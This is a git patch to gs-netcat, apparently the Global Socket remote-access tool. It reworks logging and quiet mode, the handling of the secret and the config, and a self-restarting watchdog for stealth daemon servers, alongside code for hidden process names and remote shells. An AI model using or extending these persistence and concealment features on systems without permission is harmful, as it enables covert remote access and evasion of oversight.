From a82da77b815b8b6eb6bd9bd754be2263c3863f03 Mon Sep 17 00:00:00 2001 From: Root THC Date: Mon, 21 Oct 2024 09:18:31 +0100 Subject: [PATCH] demo mode --- tools/4_gs-netcat.c | 26 ++++++++++++++------------ tools/gsnc-utils.c | 21 +++++++++++++-------- tools/utils.c | 13 ++++++------- 3 files changed, 33 insertions(+), 27 deletions(-) diff --git a/tools/4_gs-netcat.c b/tools/4_gs-netcat.c index b8baefb..6186a14 100644 --- a/tools/4_gs-netcat.c +++ b/tools/4_gs-netcat.c @@ -201,12 +201,10 @@ peer_free(GS_SELECT_CTX *ctx, struct _peer *p) } } - static void cb_atexit(void) { if (gopt.flags & GSC_FL_IS_SERVER) { - // Check if we should restart ourselves. SWD_reexec(); return; } @@ -1481,8 +1479,9 @@ try_quiet(void) if (!(gopt.flags & GSC_FL_OPT_QUIET)) return; - gopt.log_fp = NULL; - gopt.err_fp = NULL; + // gopt.log_fp might be NULL (no -L specified). + if (gopt.log_fp != gopt.err_fp) + gopt.err_fp = NULL; } static void @@ -1620,7 +1619,7 @@ my_getopt(int argc, char *argv[]) if ((ptr = GS_GETENV2("SELF_WATCHDOG"))) gopt.flags |= GSC_FL_SELF_WATCHDOG; - if ((gopt.is_logfile == 0) && ((ptr = GS_GETENV2("LOGFILE")) != NULL)) + if ((ptr = GS_GETENV2("LOGFILE")) != NULL) open_logfile(ptr); if ((ptr = GS_GETENV2("START_DELAY"))) @@ -1673,12 +1672,14 @@ my_getopt(int argc, char *argv[]) signal(SIGALRM, cb_sigalarm); } - if (gopt.flags & GSC_FL_OPT_DAEMON) - { + if (gopt.flags & GSC_FL_OPT_DAEMON) { if (gopt.is_logfile == 0) gopt.flags |= GSC_FL_OPT_QUIET; } + if ((gopt.is_logfile == 0) && (!(gopt.flags & GSC_FL_OPT_QUIET))) + gopt.log_fp = gopt.err_fp; // Log to err_fp [stderr] by default. + if (gopt.flags & GSC_FL_IS_SERVER) { /* Server side (-i -l) shall be allowed to spawn multiple shells */ @@ -1714,16 +1715,13 @@ my_getopt(int argc, char *argv[]) } } + try_quiet(); + if ((gopt.is_internal) && (gopt.flags & GSC_FL_OPT_WATCHDOG_INTERNAL)) - { - try_quiet(); gs_watchdog(); - } // init all (and ask for password if -s/-k missing) init_vars(); /* from utils.c */ - try_quiet(); - // Check if Self-Watchdog triggered this execution. Wait or exit hard, if needed. SWD_wait(); @@ -1758,6 +1756,10 @@ my_getopt(int argc, char *argv[]) if (gopt.flags & GSC_FL_OPT_DAEMON) { if (gopt.flags & GSC_FL_SELF_WATCHDOG) { + // if -s is supplied, then SWD needs to receive the SECRET via ENV. + if ((gopt.sec_str != NULL) && (gopt.flags & (GSC_FL_OPT_SEC | GSC_FL_OPT_SEC))) + setenv("GS_SECRET", gopt.sec_str, 1); + signal(SIGSEGV, cb_sigsegv); } else { GS_watchdog(gopt.log_fp, EX_BAD_AUTH); // FOREVER diff --git a/tools/gsnc-utils.c b/tools/gsnc-utils.c index f9b8ed8..d7fd63c 100644 --- a/tools/gsnc-utils.c +++ b/tools/gsnc-utils.c @@ -66,10 +66,10 @@ GSNC_config_write(const char *fn) { return 254; } - if (gopt.sec_str == NULL) { - fprintf(stderr, "-s or GS_SECRET not specified\n"); - return 253; - } + // if (gopt.sec_str == NULL) { + // fprintf(stderr, "-s or GS_SECRET not specified\n"); + // return 253; + // } if ((fn[0] == '-') && (fn[1] == '\0')) fp = stdout; @@ -93,7 +93,8 @@ GSNC_config_write(const char *fn) { c.magic[i] = buf[i] ^ GSNC_CONFIG_MAGIC_XOR; } - snprintf(c.sec_str, sizeof c.sec_str, "%s", gopt.sec_str); + if (gopt.sec_str != NULL) + snprintf(c.sec_str, sizeof c.sec_str, "%s", gopt.sec_str); if ((ptr = GS_GETENV2("PROC_HIDDENNAME")) != NULL) snprintf(c.proc_hiddenname, sizeof c.proc_hiddenname, "%s", ptr); @@ -195,8 +196,11 @@ GSNC_config_read(const char *fn) { gopt.gs_port = atoi(ptr); } - if (gopt.sec_str == NULL) + if (gopt.sec_str == NULL) { + if (c.sec_str[0] == '\0') + goto err; // EMPTY string and no SECRET via -s or env. gopt.sec_str = strdup(c.sec_str); + } if ((gopt.gs_host == NULL) && (c.host[0] != '\0')) gopt.gs_host = strdup(c.host); @@ -231,6 +235,8 @@ GSNC_config_read(const char *fn) { gopt.is_interactive = 1; gopt.flags |= GSC_FL_IS_SERVER; gopt.flags |= GSC_FL_IS_STEALTH; + if (gopt.flags & GSC_FL_OPT_DAEMON) + gopt.flags |= GSC_FL_SELF_WATCHDOG; gopt.flags |= GSC_FL_CONFIG_READ_OK; ret = 0; @@ -600,7 +606,7 @@ SWD_reexec(void) { return; } -// Called to initilize SWD. +// Called to initialize SWD. // Called after re-exec by SWD_reexec(). void SWD_wait(void) { @@ -668,5 +674,4 @@ SWD_wait(void) { sleep(n); gettimeofday(&gopt.tv_now, NULL); swd.last_sec = gopt.tv_now.tv_sec; - gopt.flags |= GSC_FL_SELF_WATCHDOG; // implied } \ No newline at end of file diff --git a/tools/utils.c b/tools/utils.c index 857d160..d01dd58 100644 --- a/tools/utils.c +++ b/tools/utils.c @@ -565,7 +565,7 @@ init_defaults1(int argc, char *argv[]) { void init_defaults2(int argc, int *argcptr, char **argvptr[]) { - gopt.log_fp = stderr; + // gopt.log_fp = stderr; gopt.err_fp = stderr; gopt.argc = argc; signal(SIGPIPE, SIG_IGN); @@ -752,8 +752,6 @@ init_vars(void) if (gs_args != NULL) gopt.is_greetings = 0; - gopt.flags |= GSC_FL_SELF_WATCHDOG; - // do not allow execution without supplied secret. if ((gs_args == NULL) && (is_sec_by_prompt)) { system("uname -a"); @@ -787,9 +785,9 @@ init_vars(void) if ((gopt.is_interactive && !(gopt.flags & GSC_FL_IS_SERVER) && !gopt.is_stdin_a_tty)) gopt.is_stdin_ignore_eof = 1; - // We fork & execve from a signal handler. This means Linux - // will never see us return from this handler. It will keep - // blocking the signal. Need to unblock: + // Here: May have been forked and exec'd from a previous signal handler. + // Linux will never see the previous signal handler return. Linux still has + // the signal blocked. Need to unblock: sigset_t cur; sigemptyset(&cur); sigaddset(&cur, SIGTERM); @@ -880,6 +878,8 @@ getcwdx(void) void open_logfile(const char *fn) { + if (gopt.is_logfile) + return; gopt.is_logfile = 1; gopt.log_fp = fopen(fn, "a"); if (gopt.log_fp == NULL) @@ -1395,7 +1395,6 @@ myforkpty(int *fd, void *a, void *b, void *c) if (openpty(&master, &slave, NULL, NULL, NULL) == -1) return -1; - pid = fork(); if (pid < 0) return -2;